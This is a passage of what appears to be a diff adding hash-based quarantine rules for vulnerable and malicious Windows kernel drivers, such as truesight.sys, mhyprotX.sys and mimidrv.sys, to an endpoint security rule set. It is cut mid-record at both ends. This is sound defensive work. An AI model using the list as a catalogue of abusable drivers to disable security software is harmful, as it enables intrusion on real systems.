"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621315Z", + "creation_date": "2026-03-23T11:45:29.621317Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621323Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3e3719ca592ba65a67f594ec1a08d0d7ad724b088be77d48cb33627c56f4614", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99577592-78e7-50a2-930b-fc4e0a5e76cc", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486773Z", + "creation_date": "2026-03-23T11:45:31.486776Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486784Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ce30adf8c4332331dd63ebc3d6c12b21598c85131536fb7aa8f79dac4975811", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "995e179d-5850-58a2-9acf-93871281a07b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968096Z", + "creation_date": "2026-03-23T11:45:29.968098Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.968104Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b6191fbda54fba328446966bec7a7208159507a8f64213e2a7202b07af14a538", + "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "995f0244-9c75-555f-92f2-26e453da7adc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493489Z", + "creation_date": "2026-03-23T11:45:31.493492Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493501Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c49c9d1e3ef2bc179db8e288ac0db8487447b2f59acc7bce7c610796e49fa4ad", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "996aab3e-906f-5a01-9e8d-ddd853926182", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140988Z", + "creation_date": "2026-03-23T11:45:31.140990Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9abd8ca4557157de1f04c741ab1e23d428e61b9e02969ef7670644dd502e44d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "996d17ef-9155-50ee-b7c2-f02b54e64490", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468982Z", + "creation_date": "2026-03-23T11:45:30.468985Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468993Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"9f35c5c9f95979f227b6d35f767dd94424285f8960c904188f0624d786ff793c", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "999f819f-bfd7-5c3d-83be-d3fc4d8b6b24", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810273Z", + "creation_date": "2026-03-23T11:45:31.810275Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810281Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a1c8ebe32fd9e469c1a296ffec12d3ba0a22215a971a8bd5f0fd472e004c6422", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99acf67e-3e83-5e27-a38a-050ae8807a47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812099Z", + "creation_date": "2026-03-23T11:45:31.812100Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812106Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b558f5f0986b32dae4da3c78671aec42b72b701978259f851bb69baf3bd546f1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99ade27e-8f1d-5fbb-919a-8f10d0ae83c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140363Z", + "creation_date": "2026-03-23T11:45:31.140365Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140371Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3ca4c909c558f4475bf892dda820fd5031b03ff5ed96495b358ab0edfd9d1ac", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99be11e0-7d01-5020-921c-d0ea22ea8c9c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622297Z", + "creation_date": "2026-03-23T11:45:29.622299Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622304Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79e87b93fbed84ec09261b3a0145c935f7dfe4d4805edfb563b2f971a0d51463", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99c5bf2f-456b-52f8-9886-d4ce602ff5bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140745Z", + "creation_date": 
"2026-03-23T11:45:31.140747Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140753Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26e74cb34a243c8f18f5e4ea5ec95533f2bcca6bc9d3ec9269f6fe4108333a4a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99c62b88-066b-5414-babf-089c060aa7b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979912Z", + "creation_date": "2026-03-23T11:45:29.979914Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979919Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f4ce6ab5e8d44f355426d9a6ab79833709f39b300733b5b251a0766e895e0e5", + "comment": "Vulnerable Kernel Driver (aka FairplayKD.sys) [https://www.loldrivers.io/drivers/31686f0e-3748-48c2-be09-fc8f3252e780/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99c95f3c-575e-55af-b662-0d99816982c2", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811453Z", + "creation_date": "2026-03-23T11:45:31.811455Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811460Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0a1627b5e27ab1cd78eaa70d9a405a30f0638c4527c786c14b1f65d1e90c453", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99d00c9e-e2fc-5b33-b3cc-1de749780df9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154604Z", + "creation_date": "2026-03-23T11:45:31.154606Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.154612Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "536990bb05abc07cbbb1bf7a3640807f4217fc68954fae7bba6c69222db031d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99d203bb-5786-58c2-a06a-466336ed3b81", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611892Z", + "creation_date": "2026-03-23T11:45:29.611894Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611899Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46cf46e1073b7c99142964b7c4bef1e5285fabcf2c6dbe5be99000a393d9f474", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99dcf548-6afa-552f-b323-ba8c2614b92d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825249Z", + "creation_date": "2026-03-23T11:45:31.825252Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825261Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4a16aaaf76fc0a94f8095ae748e7ae9da0a4e31ffe76492fc6322228f3ebdaf1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99ea1204-3511-5dae-9858-c38f27204fe8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605228Z", + "creation_date": "2026-03-23T11:45:29.605230Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605238Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "fde1b9d335167c72d64f2a47e71594ba9b6ce1a967aefc86968e9fb3e75f68dc", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99f1fb94-30e7-5c0e-8bd4-f3f48a62184d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613718Z", + "creation_date": "2026-03-23T11:45:29.613720Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613725Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99f33522-ce9e-5bf8-acf6-bd935d1dd7a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478662Z", + "creation_date": "2026-03-23T11:45:31.478665Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478673Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38ada3d86644fbf19025a9af5f00f6ffa69b1184d22e83abd43717e826b788f6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "99fb5604-e536-58eb-a964-4bc491450d75", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605845Z", + "creation_date": "2026-03-23T11:45:29.605847Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605852Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e3f2ee22dec15061919583e4beb8abb3b29b283e2bcb46badf2bfde65f5ea8dd", + "comment": 
"Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a1b1656-6c47-5d2e-b0eb-557b0b5436b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983797Z", + "creation_date": "2026-03-23T11:45:29.983799Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983805Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61a1bdddd3c512e681818debb5bee94db701768fc25e674fcad46592a3259bd0", + "comment": "Vulnerable Kernel Driver (aka GLCKIO2.sys) [https://www.loldrivers.io/drivers/52ded752-2708-499e-8f37-98e4a9adc23c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a1ef8f8-3486-5f9a-883a-6baf5f16c3eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152520Z", + "creation_date": 
"2026-03-23T11:45:31.152523Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "906fc56b9ac376f202eef00fad708b2ba9b0226eae5d941ccbe772a514367ce2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a239e43-33b5-5cfc-aa67-eed9c38df89b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825262Z", + "creation_date": "2026-03-23T11:45:30.825266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825274Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "808c745b66231b01d1655ffda763a1a3cb5077541662cdb7de3f5648e0991693", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "9a26c4dc-097c-5d0d-81a0-61da1290710c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619665Z", + "creation_date": "2026-03-23T11:45:29.619667Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619673Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d804efc9a1a012e1f68288c0a2833b13d00eecd4a6e93258ba100aa07e3406f", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a32445c-0de3-5044-ba0c-2ba635b66d2e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818452Z", + "creation_date": "2026-03-23T11:45:30.818454Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
